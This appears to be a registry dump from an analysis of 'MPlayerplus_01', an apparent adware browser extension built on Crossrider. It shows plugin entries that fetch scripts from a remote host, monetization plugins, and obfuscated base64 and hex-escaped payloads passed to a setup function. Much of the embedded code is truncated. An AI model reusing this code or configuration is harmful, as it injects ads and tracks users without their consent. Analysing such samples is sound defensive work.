[HKCU\Software\MPlayerplus_01\Plugins\262]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\246]
"Version" = "15"

[HKCU\Software\MPlayerplus_01\Plugins\281]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/281.js"

[HKCU\Software\MPlayerplus_01\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHttp)"

[HKCU\Software\MPlayerplus_01\Plugins\46]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins\4]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64"

[HKCU\Software\MPlayerplus_01\Plugins\40]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\223]
"Name" = "imonomy_m"

[HKCU\Software\MPlayerplus_01\Plugins\246]
"JavaScript" = "var _0x4cfc=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""

[HKCU\Software\MPlayerplus_01\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"

[HKCU\Software\MPlayerplus_01\Plugins\17]
"Name" = "jQuery"

[HKCU\Software\MPlayerplus_01\Plugins\192]
"Name" = "revizer_ws_dynamic_b2b_m"

[HKCU\Software\MPlayerplus_01\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

[HKCU\Software\MPlayerplus_01\Plugins\3]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/3.js"

[HKCU\Software\MPlayerplus_01\Plugins\35]
"Name" = "IEAjax"

[HKCU\Software\MPlayerplus_01\Manifest]
"BgVersion" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO4)"

[HKCU\Software\MPlayerplus_01\Plugins\4]
"URL" = "http://js.newdatastatsserv.com/plugins/javascripts/jquery-1_7_1_min.js"

[HKCU\Software\MPlayerplus_01\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.sej)"

[HKCU\Software\MPlayerplus_01\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appAR)"

[HKCU\Software\MPlayerplus_01\Plugins\7]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/7.js"

[HKCU\Software\MPlayerplus_01\Plugins\37]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/37.js"

[HKCU\Software\MPlayerplus_01\Plugins\180]
"Version" = "12"

[HKCU\Software\MPlayerplus_01\Plugins\94]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/94.js"

[HKCU\Software\MPlayerplus_01\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-聓)"

[HKCU\Software\MPlayerplus_01\Plugins\233]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/233.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\MPlayerplus_01\Plugins\42]
"Name" = "IEInternal"

[HKCU\Software\MPlayerplus_01\Plugins\226]
"URL" = "http://js.newdatastatsserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"

[HKCU\Software\MPlayerplus_01\Plugins\253]
"Version" = "1"

[HKCU\Software\MPlayerplus_01\Plugins\289]
"Version" = "1"

[HKCU\Software\MPlayerplus_01\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b攲)"

[HKCU\Software\MPlayerplus_01\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\MPlayerplus_01\Plugins\41]
"Version" = "7"

[HKCU\Software\MPlayerplus_01\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

[HKCU\Software\MPlayerplus_01\Plugins\230]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/230.js"

[HKCU\Software\MPlayerplus_01\Plugins\42]
"Version" = "10"

[HKCU\Software\MPlayerplus_01\Plugins\226]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"

[HKCU\Software\MPlayerplus_01\Plugins\78]
"Name" = "CrossriderInfo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\MPlayerplus_01\Plugins\246]
"Name" = "setup"

[HKCU\Software\MPlayerplus_01\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjEz)"

[HKCU\Software\MPlayerplus_01\Manifest]
"RunInFrame" = "false"

[HKCU\Software\MPlayerplus_01\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,93,102,104,180,184,192,220,195,211,221,223,230,233,242,244,253,260,262,263,273,275,281,286,289,91"

[HKCU\Software\MPlayerplus_01\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functio)"

[HKCU\Software\MPlayerplus_01\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n1)"

[HKCU\Software\MPlayerplus_01\Plugins\94]
"Name" = "IEPopup"

[HKCU\Software\MPlayerplus_01\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU3OTQzNDk1MTVhNDExODAyMTkwNTI2MTEwNTUzNDA0MzUyMWUxOTAxMDM1OTQ2NWUxMzRkMTMwNDA5MDcxNzEzMDMwMjU0MGExZTEwMDI1YTEwMTEwZDAzNTUwOTExMDAwYzA2MTAxMTAwMDEwZTRkMWEwNTUyMTYxYjAyMDcxZjFmMGY0ZDE1MWYxMTAxM2MzNjJlMzkzMTNmMjUzZTI3M2EyNzJjMjMyNTI2MjgyMjI4M2IzNzI2MmQyZTI5MzYzMjI5MjQzMTJjM2M0ZjEwMGExMzI0MWYxOTE5MTY1ZTM2MmUzOTMxM2YyNTNlMjczYTI3MmMyMzI1MjIyMDI2MzIzYjMyMmUyYzJlMjU0NTE4MWYwOTQ4MmMzYzJhMjMzNTMwMjMyNDI0MzEzNjMxMzYyNDI5MjYyMjI5MjQzMTJjM2M0YjVkNzA0MzUwNTY0ZDU3MWIxNzFkMDEwOTM2MDIxYTRmNGY1MzQxMDEwNTBlMTMwMzRjNDI1YTFhM2MwYTAzMWUxMTE0MDYwNzA2MmMwYTA3MTcxNTRkMDQxYTFlMTYxNzBkNDcxMjE1MGU1ZjE1MWYxMTAxNGMwMzEwMGMwMjAzMTUxZjFjMDMxNzQ3MWIwOTVjMTMxZTBjMWIxZDA2MDU0YzE5MTExNDA0MzIyYTJjMjAzYjNlMjkzMDIyM2YyOTMwMjEzYzJjMjkyZTI2M2UzMjI4MzEyYzMwM2MzMzI1MmEzNDI5MzI1MzEyMTMxOTI1MTMxNzFjMTM1MDJhMmMyMDNiM2UyOTMwMjIzZjI5MzAyMTNjMjgyMTJhM2MzZTM3MjAzMDJjM2M0ZjE5MTMwNzRkMjkzMjM2MjEyYzNhMjIyODJhMzQzMzNmMmEyNjMwMmMyMzI1MmEzNDI5MzI1NzVmNDM0OTUxNWE2OTUwNTY0ZDU1NTExMzA1MDQxZDBhMWUzZjA5NTc0OTQzNTg0MTQ4Njkw)"

[HKCU\Software\MPlayerplus_01\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { //alert(appAPI.isMatchPages(*youtube*)); //alert(appAPI.isMatchPages(*watch*)); //alert(appAPI.isMatchPages(*hd=1*)) if (appAPI.isMatchPages(*youtube*) && appAPI.isMatchPages(*watch*) && !appAPI.isMatchPages(*hd=1*)) { //alert(window.location); window.location = window.location &hd=1"

[HKCU\Software\MPlayerplus_01\Plugins\104]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI2NDRmNGU1MDQ4NTQxZTEwMWUwMDNiMWQwMjUyNTI1NjU0MGMxZTA0MWU1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjAwMDIwMjE0MTkyNTFjMDM0YzRhNDg1NDFlMTAxZTAwMWQ1NTQxNWYwOTA2MWY0YTAwMWYwMjAzMTcwNzA5MWExYTAxMWU1ZTBkMDAwMzVmMDkxMDEwMGQwNjE5MGYxYjBiNWYwYjFhMWYwMTA0MDQ1MTBiMDcwMzFjNGI0ZTQyMGIwMDFlMzAwNzE0NTUyOTI5MjczODNmM2QzYzNjMzkyYzMzMjQzYjI2MzkyOTI3M2EyZjNiMjMzNDNiMjMzNDMxMzA0ODAzNTk0YjQ2NDIxOTQyNTM1ZjQ4MDM1YjRiNDY0MjA0MTEwMzBhNTMyZjM3MzUyNDJiMzkyMzNjMjYyYTM1M2EyOTM3MzQzYTJmMjAyZTIzMzUzNzI5NTQ0ODYwNTA0ZTRmNGU1MjE4MWEwMzAzMDMxZTI3MGI0YzRhNDg0NzQ2NTA2MDBk', 'pnonphvvdj'); }"

[HKCU\Software\MPlayerplus_01\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3OTYzNDQwMDBkMDQwNDM3MDYwNjUxNTA0NjRhMjYyZjM3MzAyYjM5MjcyYjMyMjEzYTJmM2MyZDI3M2UyYzM1NDkxYjE4MWUxZDE2MGQ0NTExMDMzOTE4MTAwODExMGU1YTAwMDA0ODRhNjI3MDUyMDQwZTAxMGQxYTA0MmYwYzViNGE1NDUwNDE1OTVmNjA2ZjRhMTAxZTE4MGIxYTBmMzkzOTQ0NTI1OTUyMDMwYjFhMGUxYzFkNDgzNzI2MTIxZDNkMDQwMzBiMGYwYTM3MGMwMjE4M2QyYjRhNGU0YTQxMzcyNjMzMjYzZDI3M2UzMjNlMzUzNzMxM2YyNzM2MmIzNTVjMDgwZjQ2MWUxOTEyNWQxNzBiMWUxYTA3MDExZTFlNDkzZDJiMjkyMTI1MzUzYjJiMzkzMDI3MjYzNTMwMmIyYjM4MjYzOTMwM2QyYjRjMTExODA5MWYwYTE1MDY1ZjJiMzUzMDM4MjkzYjJhMjIzZDI2MzEzODJjMjgzNDI3MmUyMzMxMzAyYjM1NTUwODBmMGI0NDJmMmIyMTI2MjUyMDM5MzQyMTNkMzUyNjNkMjEzOTM2MzgzOTIxM2QyZjJiNDQwNjA0MTc1NzQxNDg1MjUwNWMwYzExMWQ1MzJlMDcxYzFjNTg1ZDRiNWEwZDE2MWUzMjAxMTQxNTVjNGI0ZjQ4NzkxNw==', 'jsjfhyptbt'); }"

[HKCU\Software\MPlayerplus_01\Plugins\47]
"Name" = "resources_background"

[HKCU\Software\MPlayerplus_01\Plugins\221]
"Name" = "icm_downloads_m"

[HKCU\Software\MPlayerplus_01\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

[HKCU\Software\MPlayerplus_01\Plugins\47]
"Version" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\MPlayerplus_01\Plugins\223]
"Version" = "8"

[HKCU\Software\MPlayerplus_01\Plugins\260]
"Name" = "pricedetect_sidebar_m"

[HKCU\Software\MPlayerplus_01\Plugins\269]
"Name" = "stats_ie"

[HKCU\Software\MPlayerplus_01\Debug]
"IsDebuggingPlugins" = "0"

[HKCU\Software\MPlayerplus_01\Plugins\35]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2ZTY4NTUwYzFhMTkxYTI1MTQwNjQ2NWI1NzQ2MDYxOTFlMDA1YzQ1NGIxNjAwMTM0MDFlMWYwMDAzMTgwMjA4MDQwYzQwMGUwNTFkNDkxZDE3NGUwNDAyMzEwMDBiMTkwODQ0MGUxMjA3NWIwYTAxMTkxZjEzMTgwNzA0NGEwYzA2MWIxMDFkMGYwMTEzNDcwMjE3MGIxZjIzMTQ1YjBiMDYwMjUxMjczYTI0MmU0ZDM5MzUyNzMzMzgzNzNkM2YyMzM0MjMzODNiMjQyZjMwMmIyMzJlMzUyMjM1MzczNDM1M2IyNzI5MzUyZjQwMWEwNTEzMDMwYTBiMWYwNDExMGIwZjU5M2UyODI3M2MyMjM5MjMzNDIzMjAyNDI1M2IyZjNkM2EyZjI4MmIyOTI0MjgzYjRjNDE2MDc5NDQwMjEwMTUwNzE3M2IxZjA2NTI1YzRhNDYwOTAzMTAxZTFlNTA1ZjQ5MWQxMzE2NTkxNzFiMWQwZjAyMDAwMzE3MDk1OTA3MDEwMDQ1MDcxNTQ1MTcwNzI4MDkwZjA0MDQ1ZTBjMTkxNDVlMTMwODFkMDIxZjAyMDUwZjU5MDkxZjEyMTQwMDAzMWIxMTRjMTExMjEyMTYyNzA5NTcxMTA0MDk0MjIyMjMyZDJhNTAzNTJmMjUzODJiMzIyNDM2MjcyOTJmMjIzOTJmM2MzNTMyMmEyYTI4MmUyZjM1M2YyNjNlM2UyMDMxMzI0YzAwMDcxODEwMGYxMjE2MDAwYzA3MTU1YjM1M2IyMjI1MmIzZDNlMzgzOTIyMmYzNjNlMzYzNDNlMzIyNDMxMmIyZjNiM2U1NTQ4NjQ2NDQ4MDAwYTFmMDMwODE5MmQwYTRmNTA1MDVmNTk2ZTFj', 'jdawdnmjpf'); }"

[HKCU\Software\MPlayerplus_01\Plugins\102]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/102.js"

[HKCU\Software\MPlayerplus_01\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2NjY1NWExMjBjMTUxZTJkMTgxYTRlNTY1ODU4MTAxNTFhMDg1MDU5NDMwZjFjMTQ1NjE3MDcwYjBiMTIwODQyMWIxNTE1NGUxZDFiMTgxZjFjMTg1NzRiNGM1NDU4NGY1ZDQ0NTk1YjRlNGY1NzExMWMxZDA2MTkwZDA4NTYxMDBiNWUxZDBkMDgxZjA4NTEyNzI1M2IzMzIxMmIzOTI0MjUyODNkMjgyNzI0MzYyYzJmMzgyODI5M2MyNTJiMzQyYzI3MjMzMjMzMzM1ZTBmMTU1YzMxMjcyOTI0MjMzZjJiMjgzMTI1MmIyYTM1MzczYzNjMjczNDM5MmMyYjI3MzU1NDQwNjY3MTU4MTAxNTFhMDgxOTIzMWUwMDVhNDA1ODQzMDYwYzFlMDYxZjU2NTc1NTFiMDUwMDU2MWMxZjFmMGQxYzFlNTYwMjAxMTU0NTA1MGYxZTExMGEwYzRlNWY0YzVmNDA1YjViNGE0ZjRmNTc1YjU3MWEwNDA5MDAxNzFiMWM0ZjA0MGI1NTA1MTkwZTExMWU0NTNlMzEzYjM4MzkzZjNmMmEzMzNjMjQzYzI3MmYyZTM4MjkzNjNlM2QyNTMxMmIzZjM0MzMyNTNjMjUyNzQ3MWIxNTU3MjkzMzJmMmEzNTJiMzIzYzMxMmUzMzNlMzMzOTJhMjgzZTIwMzkyNzMzMzMzMzVhNTY3MjY4NGMwODA2MDMwYjA1MTYzMzFjNDM1NDU4NTg0NDVmNjYwNQ==', 'vllxzxanxj'); }"

[HKCU\Software\MPlayerplus_01\Plugins\195]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/195.js"

[HKCU\Software\MPlayerplus_01\Plugins\93]
"Version" = "13"

[HKCU\Software\MPlayerplus_01\Plugins\242]
"Name" = "price_gong_m"

[HKCU\Software\MPlayerplus_01\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\MPlayerplus_01\Plugins\94]
"Version" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\91]
"Version" = "85"

[HKCU\Software\MPlayerplus_01\Plugins\14]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/14.js"

[HKCU\Software\MPlayerplus_01\Plugins\2]
"Name" = "ie8_fix_1"

[HKCU\Software\MPlayerplus_01\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\MPlayerplus_01\Plugins\286]
